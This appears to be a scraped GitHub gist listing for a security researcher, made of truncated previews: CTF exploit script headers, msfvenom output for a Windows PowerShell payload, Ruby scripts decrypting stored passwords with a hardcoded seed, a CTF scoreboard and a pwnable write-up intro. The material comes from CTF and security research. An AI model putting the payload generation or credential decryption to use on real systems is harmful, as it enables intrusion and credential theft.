Ditmar Wendt dwendt

@dwendt
dwendt / bank_rwctf_2019.py
Created September 16, 2019 22:06
bank.py rwctf 2019
from pwn import *
import IPython
import sha
import sys
import itertools
import string
from base64 import b64encode
from base64 import b64decode
from schnorr import *
@dwendt
dwendt / www.py
Last active May 14, 2018 06:08
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()
# Note: this shadows pwntools' p32; it packs a signed 32-bit int big-endian
def p32(v):
    return struct.pack(">i", v)
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
[DllImport("kernel32.dll")]
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from seed.properties
SEED = 'EB3452127614E25A'
def decrypt(cpass)
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn (https://keybase.io/dwn) on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

@dwendt
dwendt / gist:c25895fde82730b8f17f
Created March 25, 2016 15:00
SunCTF scores that CTFTime won't accept
{
    "standings": [
        {
            "id": 393,
            "pos": 1,
            "score": 1905,
            "team": "eipiplus1equals0"
        },
        {
            "id": 135,
@dwendt
dwendt / gist:ccf548cf646f1bce3d11
Created July 20, 2015 23:37
prolog soln for sdhit
@dwendt
dwendt / defcon15_quals_thing2.md
Created July 16, 2015 07:51
defcon15_quals_thing2.md

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64bit ABI / Calling Convention
  • ASLR, DEP/NX
  • ROP
memoArr = {};
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
    var k = charset.length;
    var a = [];
    for (var i = 0; i < k * n; i++) a.push(0);
    if (maxlen.toString() in memoArr)
        return memoArr[maxlen.toString()];
    for (var k in memoArr) {